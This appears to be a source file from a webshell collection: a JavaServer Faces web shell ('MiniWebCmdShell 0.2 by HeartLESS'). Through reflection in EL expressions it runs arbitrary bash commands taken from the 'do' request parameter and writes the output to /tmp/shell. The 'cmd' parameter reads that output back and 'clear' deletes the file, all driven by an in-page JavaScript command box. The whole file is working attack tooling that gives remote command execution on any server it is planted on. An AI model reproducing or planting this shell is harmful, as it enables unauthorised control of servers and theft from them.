webshell/jsp/java/java_faces_shell.xhtml

103 lines
3.6 KiB
HTML
Raw Normal View History

2014-05-19 01:10:17 +00:00
<?xml version='1.0' encoding='UTF-8' ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:c="http://xmlns.jcp.org/jsp/jstl/core">
<style type="text/css">
.wrapper{
border: 2px solid black;
background-color: #C0C0C0 ;
overflow:hidden;
margin: auto;
width: 50%;
word-wrap: break-word;
}
.field{
margin: 20px;
}
.output{
}
body{
background-color: #383838;
}
</style>
<body>
<c:choose>
<c:when test="${request.getParameter('do') != null}">
#{view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1,2".split(",").getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),("/bin/bash,-c,".concat(request.getParameter("do")).concat(">/tmp/shell")).split(","))}
</c:when>
<c:when test="${request.getParameter('cmd') !=null}">
<code>
<i>${request.getParameter("cmd")}</i>:
<pre>#{ view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("next").invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("useDelimiter", "a".getClass()).invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getConstructor(view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell").getClass()).newInstance(
view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell")
),"\\Z"
)
)}</pre>
</code>
</c:when>
<c:when test="${request.getParameter('clear')!= null}">
${view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1".getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"rm /tmp/shell")}
</c:when>
</c:choose>
<div class="wrapper">
<div class="field">
<center>----------------------------------------------------------</center>
<div class="output" id="output">
</div>
<center>----------------------------------------------------------</center>
<center>
<form onsubmit="return startMagic()">
<input autocomplete="off" id='cmd' name='cmd' size='100' placeholder='command' style="text-align:center; "/>
</form>
</center>
<center><font size="1"><i>Java Server Faces MiniWebCmdShell 0.2 by HeartLESS.</i></font></center>
</div>
</div>
</body>
<script type="text/javascript">
var xmlhttp;
if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
} else {// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
function startMagic(){
try{
//execution
xmlhttp.open("GET",location.pathname+"?do=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
console.log(xmlhttp.responseText);
//reading
xmlhttp.open("GET",location.pathname+"?cmd=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
a = xmlhttp.responseText.indexOf('<code>');
b = xmlhttp.responseText.indexOf('</code>');
document.getElementById('output').innerHTML = xmlhttp.responseText.substr(a+6,b-a -6);
//cleaning
xmlhttp.open("GET",location.pathname+"?clear",true);
xmlhttp.send();
}catch(e){
console.log(e);
}
return false;
}
</script>
</html>